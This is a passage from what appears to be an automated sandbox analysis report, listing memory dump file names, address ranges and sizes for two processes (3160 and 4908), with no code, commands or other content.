                                                                • memory/3160-60-0x00007FF8A9AA0000-0x00007FF8A9C29000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3160-58-0x00007FF8B9810000-0x00007FF8B9835000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3160-51-0x00007FF8B9720000-0x00007FF8B973A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                • memory/3160-52-0x00007FF8B95D0000-0x00007FF8B95FB000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/3160-32-0x00007FF8BD560000-0x00007FF8BD56F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3160-104-0x00007FF8B9810000-0x00007FF8B9835000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3160-25-0x00007FF8A9DF0000-0x00007FF8AA457000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3160-381-0x00007FF8A9DF0000-0x00007FF8AA457000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3160-232-0x00007FF8A9AA0000-0x00007FF8A9C29000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3160-344-0x0000028D475D0000-0x0000028D47B03000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3160-343-0x00007FF8A99D0000-0x00007FF8A9A9E000-memory.dmp

                                                                  Filesize

                                                                  824KB

                                                                • memory/3160-355-0x00007FF8A8F70000-0x00007FF8A94A3000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3160-372-0x00007FF8A9AA0000-0x00007FF8A9C29000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3160-380-0x00007FF8A9910000-0x00007FF8A99C3000-memory.dmp

                                                                  Filesize

                                                                  716KB

                                                                • memory/3160-366-0x00007FF8A9DF0000-0x00007FF8AA457000-memory.dmp

                                                                  Filesize

                                                                  6.4MB

                                                                • memory/3160-395-0x00007FF8A9910000-0x00007FF8A99C3000-memory.dmp

                                                                  Filesize

                                                                  716KB

                                                                • memory/3160-397-0x00007FF8A99D0000-0x00007FF8A9A9E000-memory.dmp

                                                                  Filesize

                                                                  824KB

                                                                • memory/3160-396-0x00007FF8A8F70000-0x00007FF8A94A3000-memory.dmp

                                                                  Filesize

                                                                  5.2MB

                                                                • memory/3160-394-0x00007FF8B9C60000-0x00007FF8B9C6D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3160-393-0x00007FF8B97B0000-0x00007FF8B97C4000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                • memory/3160-390-0x00007FF8B97D0000-0x00007FF8B9803000-memory.dmp

                                                                  Filesize

                                                                  204KB

                                                                • memory/3160-389-0x00007FF8B9D30000-0x00007FF8B9D3D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3160-388-0x00007FF8BCE60000-0x00007FF8BCE79000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3160-387-0x00007FF8A9AA0000-0x00007FF8A9C29000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/3160-386-0x00007FF8B9810000-0x00007FF8B9835000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/3160-385-0x00007FF8B95D0000-0x00007FF8B95FB000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/3160-384-0x00007FF8B9720000-0x00007FF8B973A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                • memory/3160-383-0x00007FF8BD560000-0x00007FF8BD56F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3160-382-0x00007FF8B9BE0000-0x00007FF8B9C07000-memory.dmp

                                                                  Filesize

                                                                  156KB

                                                                • memory/4908-91-0x000001B76ECA0000-0x000001B76ECC2000-memory.dmp

                                                                  Filesize

                                                                  136KB